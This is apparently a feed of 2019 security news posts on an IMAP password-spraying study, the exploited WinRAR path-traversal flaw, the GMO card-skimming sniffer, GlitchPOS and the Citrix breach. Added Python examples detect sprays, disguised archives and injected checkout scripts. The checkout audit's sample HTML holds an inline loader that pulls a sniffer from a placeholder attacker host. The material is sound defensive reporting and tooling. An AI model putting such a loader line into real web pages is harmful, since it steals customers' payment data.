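The study describes the detection problem in one sentence: each account sees only one or two failures, so nothing trips a lockout, and the spray is visible only when failures are correlated by source across many accounts and restricted to legacy protocols. The following is an added example, not code from Proofpoint or from the article, showing that correlation in Python over a constructed authentication-log format (timestamp, source IP, protocol, user, result; the format and the sample lines are assumptions). It flags a source that fails against many distinct accounts over IMAP/POP3/SMTP inside a short window with few attempts per account, then lists successful legacy-protocol logins from that source, which is the breach signal for service accounts and shared mailboxes.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not from Proofpoint or the article). The format is an
# assumed generic authentication log: timestamp, source IP, protocol, user, result.
SAMPLE_LOG = """\
2019-02-12T03:14:07Z src=203.0.113.7 proto=IMAP user=alice@example.com result=FAIL
2019-02-12T03:14:09Z src=203.0.113.7 proto=IMAP user=bob@example.com result=FAIL
2019-02-12T03:14:12Z src=203.0.113.7 proto=IMAP user=carol@example.com result=FAIL
2019-02-12T03:14:15Z src=203.0.113.7 proto=IMAP user=dave@example.com result=FAIL
2019-02-12T03:14:18Z src=203.0.113.7 proto=IMAP user=erin@example.com result=FAIL
2019-02-12T03:14:21Z src=203.0.113.7 proto=IMAP user=frank@example.com result=FAIL
2019-02-12T03:14:24Z src=203.0.113.7 proto=IMAP user=shared-mailbox@example.com result=SUCCESS
2019-02-12T03:20:00Z src=198.51.100.2 proto=HTTPS user=alice@example.com result=FAIL
2019-02-12T03:20:05Z src=198.51.100.2 proto=HTTPS user=alice@example.com result=SUCCESS
2019-02-12T09:00:00Z src=192.0.2.9 proto=IMAP user=grace@example.com result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) proto=(?P<proto>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)
# Protocols that authenticate with a bare password and cannot present an MFA challenge.
LEGACY_PROTOCOLS = {"IMAP", "POP3", "SMTP"}


def parse_log(text):
    """Parse the assumed log format into a list of event dicts with datetime timestamps."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not match the assumed format
        event = m.groupdict()
        event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(event)
    return events


def detect_password_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=3):
    """Flag each source IP that fails against at least `min_users` distinct accounts over a
    legacy protocol inside `window`, with at most `max_per_user` failures per account
    (i.e. staying under a typical lockout threshold). Returns one alert per source."""
    failures_by_src = defaultdict(list)
    for e in events:
        if e["proto"] in LEGACY_PROTOCOLS and e["result"] == "FAIL":
            failures_by_src[e["src"]].append(e)

    alerts = []
    for src, fails in failures_by_src.items():
        fails.sort(key=lambda e: e["ts"])
        best = None
        start = 0
        for end in range(len(fails)):
            # slide the window start forward until the span fits inside `window`
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            per_user = defaultdict(int)
            for e in fails[start:end + 1]:
                per_user[e["user"]] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if best is None or len(per_user) > best["distinct_users"]:
                    best = {"src": src, "distinct_users": len(per_user),
                            "first": fails[start]["ts"], "last": fails[end]["ts"]}
        if best is not None:
            alerts.append(best)
    return alerts


def legacy_successes_after_spray(events, alerts):
    """Successful legacy-protocol logins from a flagged source: likely compromised accounts."""
    flagged = {a["src"] for a in alerts}
    return [e for e in events
            if e["src"] in flagged and e["proto"] in LEGACY_PROTOCOLS and e["result"] == "SUCCESS"]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    found = detect_password_spray(evs)
    for a in found:
        print(f"spray from {a['src']}: {a['distinct_users']} accounts between {a['first']} and {a['last']}")
    for hit in legacy_successes_after_spray(evs, found):
        print(f"legacy login succeeded for {hit['user']} from {hit['src']}")
```

The thresholds are deliberately low for the constructed sample; in production they are tuned per tenant, and the source key can be widened to an ASN or /24 because the article notes the attackers rotate through a botnet of hijacked routers and servers. Detection is the second line: the first is disabling legacy authentication (IMAP, POP3, SMTP basic auth) for users who do not need it, so that the password alone is never sufficient.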


The attackers leveraged a botnet composed of thousands of hijacked network devices (e.g. routers and servers) to launch the attacks.

“These hijacked devices gained access to a new tenant every 2.5 days on average during a 50-day period,” continues Proofpoint.

China was the source for the vast majority of the IMAP-based attacks (53%), followed by Brazil (39%) and the United States (31%).

Most of the attacks (63%) originated from Nigerian IP addresses, followed by South African infrastructure (21%), and the United States via VPNs (11%).

“This study demonstrates the increasing sophistication of threat actors around the world who are leveraging brute force methods, massive credential dumps, and successful phishing attacks to compromise cloud accounts at unprecedented scale. Service accounts and shared mailboxes are particularly vulnerable while multifactor authentication has proven vulnerable.” concludes the study.

“Attackers parlay successful compromises into internal phishing attacks, lateral movement in organizations, and additional compromises at trusted external organizations.”

Pierluigi Paganini

(SecurityAffairs – IMAP, hacking)

The post Massive attacks bypass MFA on Office 365 and G Suite accounts via IMAP Protocol appeared first on Security Affairs.


US-CERT warns of New Zealand mosque shooting scams and malware campaigns

In the wake of the New Zealand mosque shooting, the CISA recommends that users remain vigilant against possible scams and malware attacks.

Yesterday the horrible mass mosque shooting in New Zealand made the headlines; fifty people were killed. A gunman used a GoPro camera to live-stream the massacre at a mosque.

[Image: New Zealand mosque shooting. Source: The Financial Times]

Although social media companies immediately removed the content from their platforms, it is still possible to find multiple copies of the shooting videos online.

YouTube issued a statement condemning the snuff videos, confirming that it is removing them from its platform.

Unfortunately, curious people are searching for the video of the New Zealand mosque shooting, and crooks are aware of that and are attempting to exploit the interest in the cruel footage.

In the wake of the New Zealand mosque shooting, the Cybersecurity and Infrastructure Security Agency (CISA) recommends that users remain vigilant against possible scams and malware attacks.

Government experts are warning of spam campaigns using messages containing links pointing to malware or using malicious attachments.

“Users should exercise caution in handling emails related to the shooting, even if they appear to originate from trusted sources.” reads the security advisory published by the US-CERT. “Fraudulent emails often contain links or attachments that direct users to phishing or malware-infected websites.”

Experts believe attackers could send fake emails requesting donations on behalf of charitable organizations; the US-CERT also warns of fraudulent social media pleas, calls, texts, donation websites, and door-to-door solicitations relating to the event.

To avoid becoming a victim of malicious activity, users have to use caution when opening email attachments, even if the messages are sent from trusted sources. Another best practice is to avoid clicking on links in unsolicited email messages.

Pierluigi Paganini

(SecurityAffairs – New Zealand mosque shooting, hacking)

The post US-CERT warns of New Zealand mosque shooting scams and malware campaigns appeared first on Security Affairs.


E Hacking News – Latest Hacker News and IT Security News: Hacker who was offering Cybercrime-as-a-service detained in Novokuznetsk



Employees of the Ministry of Internal Affairs of Russia, with the assistance of experts from Group-IB, an international company specializing in the prevention of cyber attacks, detained a hacker in the Russian city of Novokuznetsk who hacked computers around the world.

The detainee offered Cybercrime-as-a-Service to cyber criminals: he created and maintained admin panels for managing malware and botnets.

According to the local report, he infected more than 50,000 computers across the world. He managed to steal usernames and passwords from the browsers and mail clients of the infected computers. He also reportedly stole financial information such as bank card details.

The investigation began in the spring of 2018, when the hacker infected around 1,000 computers with the Formgrabber malware.

“He administered the botnet, which counted several thousand infected computers of Russian and foreign users,” the press service of the Ministry of Internal Affairs reported.

It turned out that the hacker is only 26 years old; since the age of 15 he has earned money by creating websites for computer games, but then he decided to learn the profession of a hacker. More recently, he was testing malware targeting the Android platform.

He has already been charged under the article "Creation and distribution of malicious computer programs". He completely admitted his guilt.



Counter-Strike 1.6 game client 0-day exploited to spread Belonard trojan

By Waqas

Dr. Web’s cybersecurity researchers have identified an attacker trying to exploit zero-day vulnerabilities in the Counter-Strike 1.6 game client specifically to distribute the Belonard Trojan. Reportedly, about 39% of all the active servers of the game on Steam have been manipulated and compromised to hack the computers of gamers from a remote location. Counter-Strike 1.6, released around […]

This is a post from HackRead.com Read the original post: Counter-Strike 1.6 game client 0-day exploited to spread Belonard trojan

Recently fixed WinRAR bug actively exploited in the wild

Several threat actors are still exploiting a recently patched critical vulnerability in the popular compression software WinRAR.

Several threat actors are actively exploiting a critical remote code execution vulnerability recently addressed in WinRAR.

The exploitation of the flaw in the wild is worrisome because the WinRAR software doesn’t have an auto-update feature, leaving millions of users potentially exposed to cyber attacks.

The vulnerability, tracked as CVE-2018-20250, was discovered by experts at Check Point in February; it could allow an attacker to gain control of the target system.

Over 500 million users worldwide use the popular software and are potentially impacted by the flaw, which affects all versions released in the last 19 years.

The flaw is an “Absolute Path Traversal” issue in the library that could be exploited to execute arbitrary code by using a specially-crafted file archive.


The issue resides in UNACEV2.DLL, an old third-party library used by WinRAR to extract files compressed in the ACE data format. The experts pointed out that WinRAR determines the file format by analyzing its content rather than the extension, which means an attacker can rename a .ace file to .rar to trick victims.

The researchers discovered that an attacker leveraging the path traversal vulnerability could extract compressed files to a folder of their choice rather than the folder chosen by the user. A malicious executable dropped into the Windows Startup folder would automatically run on the next reboot.
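Two defensive checks follow directly from the paragraphs above: an archive must be classified by its magic bytes rather than by its extension, because that is exactly the mismatch the attackers rely on, and an extractor must reject entry names that are absolute or contain `..` components, because that is the path-traversal primitive. The example below is added here and is not code from WinRAR, Check Point or the article; it is written in Python for use in a mail gateway or file-scanning pipeline. The RAR (`Rar!\x1a\x07`), ZIP (`PK\x03\x04`) and ACE (`**ACE**` at byte offset 7) signatures are the formats' real markers; the sample byte strings are constructed header stubs, not real archives.

```python
import os

# Real format signatures: RAR 4.x/5.x archives begin with "Rar!\x1a\x07", ZIP local
# file headers with "PK\x03\x04", and ACE archives carry "**ACE**" at byte offset 7.
RAR_MAGIC = b"Rar!\x1a\x07"
ZIP_MAGIC = b"PK\x03\x04"
ACE_MARKER = b"**ACE**"
ACE_MARKER_OFFSET = 7


def detect_archive_format(data: bytes) -> str:
    """Classify by content, the way WinRAR itself does, ignoring the file name."""
    if data.startswith(RAR_MAGIC):
        return "rar"
    if data[ACE_MARKER_OFFSET:ACE_MARKER_OFFSET + len(ACE_MARKER)] == ACE_MARKER:
        return "ace"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def is_disguised_ace(filename: str, data: bytes) -> bool:
    """True when the content is ACE but the name claims another extension (e.g. .rar)."""
    ext = os.path.splitext(filename)[1].lower()
    return detect_archive_format(data) == "ace" and ext != ".ace"


def scan_samples(samples):
    """samples: dict of file name -> bytes. Returns the names that should be quarantined."""
    return sorted(name for name, data in samples.items() if is_disguised_ace(name, data))


def is_unsafe_entry_name(name: str) -> bool:
    """The check a safe extractor applies to every archive entry: reject absolute paths
    (drive letter or leading slash) and any '..' component, so that an entry can never
    land outside the directory the user chose."""
    normalized = name.replace("\\", "/")
    if len(normalized) >= 2 and normalized[1] == ":":
        return True  # e.g. C:/... absolute Windows path
    if normalized.startswith("/"):
        return True
    return any(part == ".." for part in normalized.split("/"))


# Constructed sample bytes (not real archives): just enough header to exercise the checks.
SAMPLES = {
    "album.rar": b"\x00" * 7 + ACE_MARKER + b"\x00" * 16,  # ACE content behind a .rar name
    "real.rar": RAR_MAGIC + b"\x00" * 17,
    "notes.ace": b"\x00" * 7 + ACE_MARKER + b"\x00" * 16,
    "doc.zip": ZIP_MAGIC + b"\x00" * 16,
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name}: {detect_archive_format(data)}"
              + ("  <-- disguised ACE" if is_disguised_ace(name, data) else ""))
```

The extension check is a triage signal, not proof of exploitation: a legitimate ACE archive renamed by a careless user trips it too. The entry-name check is the one that actually closes the class of bug, and it belongs in any extractor regardless of format.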

The WinRAR development team addressed the issue with the release of WinRAR version 5.70 beta 1.

The following video PoC shows how to gain full control over a targeted system by tricking the victim into opening a maliciously crafted compressed archive file using WinRAR.

A few days after the disclosure of the flaw, researchers at the 360 Threat Intelligence Center discovered a malspam campaign distributing a malicious RAR archive that exploited the flaw to deliver malware to a computer.

Now, security experts from McAfee reported that attackers continue to exploit the WinRAR flaw; they identified more than “100 unique exploits and counting” in the first week since the vulnerability was publicly disclosed.

“In the first week since the vulnerability was disclosed, McAfee has identified over 100 unique exploits and counting, with most of the initial targets residing in the United States at the time of writing.” reads the advisory published by McAfee.

According to the experts, most of the initial targets are located in the United States. In one case attackers attempted to spread the malware through a bootlegged copy of Ariana Grande’s hit album “Thank U, Next” with a file name of “Ariana_Grande-thank_u,_next(2019)_[320].rar”.

The file associated with the fake Ariana Grande’s hit album is currently detected by a limited number of antivirus solutions.

The malicious RAR file (Ariana_Grande-thank_u,_next(2019)_[320].rar) extracts a list of harmless MP3 files to the victim’s download folder along with a malicious executable file to the startup folder that allows infecting the targeted system.

“When a vulnerable version of WinRAR is used to extract the contents of this archive, a malicious payload is created in the Startup folder behind the scenes. User Access Control (UAC) is bypassed, so no alert is displayed to the user. The next time the system restarts, the malware is run.” continues the analysis.

Experts recommend that users keep their systems up to date, install the latest version of WinRAR, and avoid opening files from untrusted sources.

Pierluigi Paganini

(SecurityAffairs – WinRAR, hacking)

The post Recently fixed WinRAR bug actively exploited in the wild appeared first on Security Affairs.

Ransomware’s New Normal

GandCrab’s evolution underscores a shift in ransomware attack methods. Don’t be fooled by the drop in overall ransomware attacks this past year: Fewer but more targeted and lucrative campaigns against

The post Ransomware’s New Normal appeared first on The Cyber Security Place.

GlitchPOS PoS Malware appears in the cybercrime underground

A new piece of PoS malware appeared in the threat landscape, the malicious code dubbed GlitchPOS has been found on a crimeware forum.

The GlitchPOS malware is able to steal credit card numbers (Track1 and Track2) from the memory of the infected system, it uses a regular expression to perform this task.

The malicious code was discovered by experts from Cisco Talos, the pre-built malware goes for $250, while the builder goes for $600. Experts also found it on alternative websites at a higher price.

The PoS malware first appeared on February 2; the experts assess with high confidence that it was developed by a malware author known as Edbitss, who a few years ago was distributing the DiamondFox L!NK botnet.

“Cisco Talos recently discovered a new PoS malware that the attackers are selling on a crimeware forum. Our researchers also discovered the associated payloads with the malware, its infrastructure and control panel. ” reads the post published by the Talos team.


The GlitchPOS malware is well designed and very easy to use; it was distributed via spam messages.

The malware is protected by a packer developed in VisualBasic, it pretends to be a game and the user interface of the main form contains various pictures of cats.

“The purpose of the packer is to decode a library that’s the real payload, encoded with the UPX packer,” continues the analysis.

“Once decoded, we gain access to GlitchPOS, a memory grabber developed in VisualBasic.”

The payload is very small and supports only a few functions, including registering the infected systems, receiving tasks from the C2, exfiltrating credit-card numbers from the memory of the infected systems, and cleaning itself.

The malicious code receives tasks from the C2 server, the commands are executed via a shellcode directly sent by the command and control server.

Researchers suspect that the seller behind GlitchPOS – who goes by the name “Edbitss” – has developed malware before.

The Talos team found many similarities between the DiamondFox L!NK botnet and GlitchPOS, such as the programming language and the appearance of the panels, a circumstance suggesting that the author reused a portion of code from the DiamondFox panel.

“This investigation shows us that POS malware is still attractive and some people are still working on the development of this family of malware.” concludes Talos. “We can see that edbitss developed malware years even after being publicly mentioned by cybersecurity companies. He left DiamondFox to switch on a new project targeting point-of-sale. The sale opened a few weeks ago, so we don’t know yet how many people bought it or use it.”

Pierluigi Paganini

(SecurityAffairs – GlitchPOS, point-of-sale malware )

The post GlitchPOS PoS Malware appears in the cybercrime underground appeared first on Security Affairs.

SimBad malware on Play Store infected millions of Android devices

By Waqas

Most of the applications infected by SimBad malware are simulator games. The IT security researchers at Check Point have discovered a sophisticated malware campaign that has been targeting Android users through Google Play Store on a global level and so far more than 150 million users have fallen prey to it. Dubbed SimBad by researchers; the malware disguises […]

This is a post from HackRead.com Read the original post: SimBad malware on Play Store infected millions of Android devices

Payment data of thousands of customers of UK and US online stores could have been compromised

Group-IB, an international company that specializes in preventing cyberattacks, has uncovered a malicious code designed to steal customers’ payment data on seven online stores in the UK and the US.

The injected code has been identified as a new JavaScript Sniffer (JS Sniffer), dubbed by Group-IB as GMO. Group-IB Threat Intelligence team first discovered the GMO JS Sniffer on the website of the international sporting goods company FILA UK, which could have led to the theft of payment details of at least 5,600 customers for the past 4 months.  

Do your payments have the sniffles?

The most recent breaches similar to this include British Airways and Ticketmaster, first analyzed by the RiskIQ research team, where cybercriminals managed to compromise the personal information of thousands of travelers and concert goers with a few lines of code. The British Airways and Ticketmaster websites were infected with JS Sniffers, a type of malicious code injected into a victim’s website and designed to steal consumers’ personal data including payment card details, names, credentials, etc. The FILA UK website (fila.co[.]uk) became cybercriminals’ new major target on the UK market. The GMO JS Sniffer has also been discovered on 6 other websites of US-based companies. This type of attack is especially dangerous given that it can be applied to almost any e-commerce site around the world. Group-IB made multiple attempts to alert FILA, which was known to be impacted by GMO. The six other websites affected by this JS Sniffer were notified upon discovery as well. The Group-IB team has also reached out to local authorities in the UK and the US to conduct outreach.

Group-IB’s Threat Intelligence team first discovered GMO on the FILA UK website. The malicious code was detected in early March 2019. In the course of further research it was revealed that the GMO JS Sniffer has presumably been collecting customer payment data since November 2018. According to Alexa.com, the number of fila.co[.]uk unique monthly visitors is estimated at around 140k per month. According to IRP, a UK market research firm, the minimum conversion into purchase for fashion and clothing ecommerce is 1%. Using very conservative estimates, the payment and personal details of at least 5,600 customers could have been stolen by cybercriminals: everyone who has purchased items on fila.co.uk since November 2018 has potentially had their details compromised. Typically, stolen customer data is resold on underground card shops. Another cash-out scheme involves the use of compromised cards to buy valuable goods, e.g. electronics, for onward sale.

“One-line card stealing code downloads a JavaScript Sniffer once a customer lands on a checkout page, which intercepts credit card data and sends it to local storage. After, the payment cards’ details are sent to the JS Sniffer’s gate which is located on the same server as a JS Sniffer script itself. Cybercriminals might have injected a malicious code by either exploiting a vulnerability of Magento CMS (content management system), used by FILA.co.uk, or simply by compromising the credentials of the website administrator using special spyware or cracking password with brute force methods” – comments Dmitry Volkov, CTO and Head of Threat Intelligence at Group-IB. “We dubbed this JS Sniffer family GMO because the malware uses gmo[.]li host.”

Fig. 1 The screenshot shows a one-line code (line # 771) that downloads a JS Sniffer designed to steal customers’ data once a user lands on a checkout page.

Fig. 2 The screenshot shows part of the JS Sniffer that detects Chrome Dev Tools and Firebug, and the Sniffer downloaded to the user’s browser once a user lands on a checkout page.

Fig. 3 The screenshot shows part of the JS Sniffer with functions for collecting the victim’s billing and payment information and sending the extracted information to cybercriminals via an image request.

Fig. 4 The screenshot shows part of the JS Sniffer that calls functions for collecting and sending the victim’s payment information to cybercriminals.

Later Group-IB’s specialists found other websites infected with the GMO JS Sniffer. The list included six ecommerce stores with a total of around 350,000 monthly unique visitors (according to Alexa.com rankings): http://jungleeny[.]com (Home design store), https://forshaw[.]com/ (Pest Management Products Store), https://www.absolutenewyork[.]com/ (Cosmetics Store), https://www.cajungrocer[.]com/ (Online Grocery Store), https://www.getrxd[.]com/ (Training Equipment Store), https://www.sharbor[.]com/ (Video Editing Apparel store).

E pluribus unum?

GMO is a family of JS Sniffers that targets Magento-based online stores. GMO can detect Firebug and Google Developer Tools, which allows the sniffer to remain undetected. Group-IB’s Threat Intelligence team discovered that GMO has been active since May 2018. The domain name used for the sniffer’s code storage and as a gate for stolen data collection was registered on May 7, 2018. The newly discovered GMO JS Sniffer is one of the 15 families of sniffers described by Group-IB in its new report that the company is prepping to release soon. Group-IB Threat Intelligence customers will be the first to receive the report. Nine out of these fifteen JS Sniffer families were not previously researched.
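The mechanics described above (a one-line loader injected into the checkout page, a sniffer script pulled from a third-party host, stolen fields sent out through an image request) are what a store operator can monitor for. The following is an added example, not code from Group-IB or from any of the affected stores, showing in Python a checkout-page audit that flags external script sources and inline loaders pointing at hosts outside an allowlist, and that builds the Content-Security-Policy header which would block both the loader and the image-request exfiltration channel. The checkout HTML, the allowlisted hosts and the loader host `cdn-stat.attacker.example` are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page (not a real store's HTML): two legitimate scripts, one inline
# one-liner that loads a sniffer from a placeholder host, and one harmless inline script.
SAMPLE_HTML = """
<html><head>
<script src="https://shop.example/static/js/checkout.js"></script>
<script src="https://js.payments-provider.example/v1/sdk.js"></script>
</head><body>
<form id="checkout">...</form>
<script>var s=document.createElement('script');s.src='https://cdn-stat.attacker.example/js/gmo.js';document.body.appendChild(s);</script>
<script>window.dataLayer = window.dataLayer || [];</script>
</body></html>
"""

# Hosts the store's own build is known to reference on the checkout page (assumed).
ALLOWED_HOSTS = {"shop.example", "js.payments-provider.example"}
URL_RE = re.compile(r'''https?://[A-Za-z0-9.\-]+(?::\d+)?[^\s'"<>]*''')


class ScriptCollector(HTMLParser):
    """Collects <script src=...> targets and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline_script = True

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_inline_script = False


def audit_checkout_page(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, host) findings for every script host not in the allowlist.
    'external-script' is a <script src> to an unknown host; 'inline-loader' is an inline
    script that embeds a URL to an unknown host (the one-line loader pattern)."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.append(("external-script", host))
    for body in collector.inline:
        for url in URL_RE.findall(body):
            host = urlparse(url).hostname
            if host and host not in allowed_hosts:
                findings.append(("inline-loader", host))
    return findings


def build_csp(allowed_hosts=ALLOWED_HOSTS):
    """A Content-Security-Policy for the checkout page: scripts only from the allowlist
    (no 'unsafe-inline', so an injected one-liner does not execute), and images and
    fetch/XHR confined to the site itself, so an image-request beacon to an attacker
    host is refused by the browser."""
    script_src = " ".join(sorted("https://" + h for h in allowed_hosts))
    return (f"default-src 'self'; script-src 'self' {script_src}; "
            f"img-src 'self'; connect-src 'self'")


if __name__ == "__main__":
    for kind, host in audit_checkout_page(SAMPLE_HTML):
        print(f"{kind}: {host}")
    print(build_csp())
```

The audit is meant to run against the page as served to customers, on a schedule, and to diff against the last known-good result; a new host is the alarm. The CSP is only as trustworthy as the server that emits it: the article notes the GMO code was most likely injected through a Magento vulnerability or a stolen administrator credential, and an attacker with that level of access can also relax the policy, so the header is a layer on top of patching the CMS and protecting admin logins, not a substitute for them.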

“JS Sniffers are a type of malware that remains poorly researched. Despite its simplicity, it is capable of causing massive financial and reputational damage to huge international corporations and therefore should not be underestimated. Recent data breaches at British Airways and Ticketmaster proved this point. And not only small online stores get affected, but also payment systems and banks whose clients suffer from payment data leaks. The umbrella term “Magecart” given to these attacks by RiskIQ analysts should be much broader than that. There are many more groups using distinct families of JS Sniffers capable of targeting online stores. Since in some cases it is difficult to determine how many people use the sniffer, Group-IB experts call them families, not groups. Every family of JS Sniffers has unique characteristics and requires a detailed analysis,” says Dmitry Volkov.

“Group-IB Threat Intelligence team continuously analyses new types of JS Sniffers: multipurpose and specific, designed to target particular content management systems. Considering the size of the market and the mounting threat JS Sniffers pose, Group-IB decided to analyze several sniffer families, enriching the knowledge about this malware significantly and adding to the prior attempts to research JS Sniffers.”

About Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

Pierluigi Paganini

(SecurityAffairs – payment data, cybercrime)

The post Payment data of thousands of customers of UK and US online stores could have been compromised appeared first on Security Affairs.

Torrent Risks: How to get infected through torrent with a good reputation

Experts at Cybaze-Yoroi Z-Lab have conducted an interesting analysis of the risks users face when downloading films, games, and software via torrents.

Digital media sharing is one of the most significant phenomena since the advent of the Internet. During the 80s and 90s, with the rapid growth of the Internet, people around the world started sharing copyrighted digital content through protocols and programs such as FTP and IRC.

At the time, only a few people were able to access these illegal networks. Today the situation is quite different: it is very easy to share any kind of content through simplified file-sharing services, which makes it easy to obtain copyrighted material and pirated copies of popular software.

Cybaze-Yoroi Z-Lab researchers conducted a study on the risks related to using the BitTorrent protocol to download movies, games or pirated software. The analysis sheds light on the risk users face while searching for movies, games, and software on popular BitTorrent trackers. The experts analyzed dozens of torrents and discovered that most of them are bundled with malware or adware, exposing the average user to infection with just a few interactions.

In this analysis, the researchers downloaded torrents belonging to three categories of interest: Movies, Games and Software. For the Movies category they searched for two highly anticipated films, “The Avengers 4” and “Joker”; for the Games category they searched for “Fortnite”, one of the most played video games; and for the Software category they searched for some of the most requested software of the moment, “Nero Burning Rom”, “Adobe Photoshop Lightroom” and “Malwarebytes Premium”.

The experts discovered that most of the torrents contain well-known malware that is currently detected by most anti-virus products, and also that most of the malicious torrents have a good reputation in terms of seeders. In BitTorrent terminology, seeders are …

Download the full White Paper

The post Torrent Risks: How to get infected through torrent with a good reputation appeared first on Security Affairs.

e-Crime & Cybersecurity Congress: Cloud Security Fundamentals

I was a panellist at the e-Crime & Cybersecurity Congress last week; the discussion was titled 'What's happening to your business? Cloud security, new business metrics and future risks and priorities for 2019 and beyond'. Here is a recap of the points I made.

Cloud is the 'Default Model' for Business

Cloud is now the default model for IT services in the UK; cloud ticks all the efficiency boxes a successful business continually craves. Indeed, the 'economies of scale' benefits are not just more cost-effective and more agile IT services, but also better cybersecurity (from the major cloud service providers), even for the largest of enterprises. It is not the CISO's role to challenge the business's cloud migration, which is typically part of a wider digital transformation strategy, but to ensure cloud services are delivered and managed to legal, regulatory and client security requirements, and in satisfaction of the board's risk appetite, given the board ultimately owns the cybersecurity risk, which is an operational business risk.

There are security pitfalls with cloud services; the marketing gloss of 'the cloud' should not distract security professionals into assuming IT security will be delivered as per the shiny sales brochure. After all, cloud service providers should be considered and assessed in the same way as any other traditional third-party IT supplier to the business.

Cloud Security should not be an afterthought

It is essential for security to be baked into the design of a new cloud service, into requirements determination, and into the procurement process; in particular, the areas of security responsibility must be defined and documented with the intended cloud service provider.

Cloud does not absolve the business of their security responsibilities

All cloud service models, whether the standard models of Infrastructure as a Service (IaaS), Platform as a Service (PaaS) or Software as a Service (SaaS), always involve three areas of security responsibilities to define and document:
  • Cloud Service Provider Owned
  • Business Owned
  • Shared (Cloud Service Provider & Business)
For example, with a PaaS model the business is fully responsible for deploying applications onto the cloud platform, and therefore for the security of those applications. The cloud service provider is responsible for the security of the physical infrastructure, network and operating system layers. An example of 'shared' responsibility in this model is the process of provisioning and managing privileged operating system accounts within the cloud environment.

Regardless of the cloud model, data is always the responsibility of the business.


A "Trust but Verify" approach should be taken with cloud service providers when assuring the security controls they are responsible for. Where security responsibilities are owned by or shared with the cloud service provider, ensure the specific controls and processes are detailed within a contract or a supporting agreement as service deliverables, then oversee those controls and processes through regular assessments.

Citrix Discloses Data Breach By International Cyber Criminals


An enormous data breach of the well-known enterprise software company Citrix by "international cyber criminals" was disclosed over the weekend, with the company reporting a compromise of its internal network.

The company, known for providing its services to the U.S. military, the FBI, numerous U.S. corporations and various U.S. government agencies, was warned by the FBI that foreign hackers had compromised its IT systems and exfiltrated "business documents". Citrix added that it did not yet know exactly which records and documents the hackers acquired, nor how they got in in the first place.

In a blog post, Citrix said: “While not confirmed, the FBI has advised that the hackers likely used a tactic known as password spraying, a technique that exploits weak passwords. Once they gained a foothold with limited access, they worked to circumvent additional layers of security...”

“Password spraying” is an attack in which the attacker tries a small number of common, weak passwords against many accounts (rather than many passwords against one account, which would trigger lockouts), gaining an initial toehold in the company's systems from which to launch broader attacks.

The data breach at Citrix has been identified as part of "a sophisticated cyber espionage campaign supported by nation-state due to strong targeting on government, military-industrial complex, energy companies, financial institutions and large enterprises involved in critical areas of the economy," said Resecurity, an infosec firm, in a blog post.

The researchers at Resecurity shed more light on the incident, about which Citrix has declined to disclose many details, stating that they had earlier warned both the Feds and Citrix about the "targeted attack and data breach."

Resecurity says that the Iranian-backed IRIDIUM hacker group hit Citrix in December last year and again on Monday, 4 March, and reportedly stole approximately 6 terabytes of sensitive internal files, including messages, emails, blueprints and various other documents.

The Florida-based company stressed that there was no sign that the hackers compromised any Citrix product or service, and that it had launched a "forensic investigation", engaged a leading cyber security firm, and taken "actions" to secure its internal network.


Since the consequences of the Citrix 'security incident' could be grave and could affect a wide range of targets, as the company holds sensitive data on other organisations, including critical infrastructure, government and enterprises, strict measures will need to be taken to secure it inside and out.

Enterprise VPN Provider Citrix, Hacked; 6TB of Sensitive Data Stolen



Enterprise VPN provider Citrix has been hit by a hack in which the attackers are suspected to have stolen private data about the company's technology.

On Friday, Citrix said that the FBI had informed it that "international cyber criminals" had worked their way into the organisation's networks.

The company was further told that the criminals most probably used the technique of "password spraying" to break into its networks, doing so by correctly guessing the password to an account belonging to the company.

The hackers involved are reported to be part of an Iranian hacking group that has attacked over 200 companies, along with multiple government agencies, technology firms, and oil and gas companies.

According to a blog post by Resecurity, the cybersecurity firm had contacted Citrix to warn it about the hack.

While declining to say how it learned of the hack, the firm said it "has shared the acquired intelligence with law enforcement and partners for mitigation."

While the FBI declined to comment on the matter, Resecurity drew a connection between the hackers and a nation state, "due to strong targeting on government, military-industrial complex, energy companies, financial institutions and large enterprises involved in critical areas of economy."

Citrix said the attackers had probably acquired and downloaded business documents, noting, "The specific documents that may have been accessed, however, are currently unknown."

"Citrix has taken action to contain this incident. We commenced a forensic investigation; engaged a leading cybersecurity firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI," the company further included in the notice.


Applicants data of 3 elite US colleges hacked for ransom

By Ryan De Souza

Recently it was reported that Chinese hackers are targeting around 26 leading research institutions, the majority of them based in the USA, to steal research on maritime technology. In the same week, three prominent private colleges said that their systems were hacked and that the hackers managed to gain access to […]

This is a post from HackRead.com Read the original post: Applicants data of 3 elite US colleges hacked for ransom

Hackers steal 6TB of data from enterprise software developer Citrix

By Waqas

Enterprise software developer Citrix has become the victim of a state-sponsored hack after attackers stole the company’s secrets. Citrix, one of the most popular providers of enterprise software, networking and remote access technology, confirmed that its internal network was compromised by international criminals. Reportedly, the attackers exploited weak passwords and managed to get limited access […]

This is a post from HackRead.com Read the original post: Hackers steal 6TB of data from enterprise software developer Citrix

Games people play: testing cybersecurity plans with table-top exercises

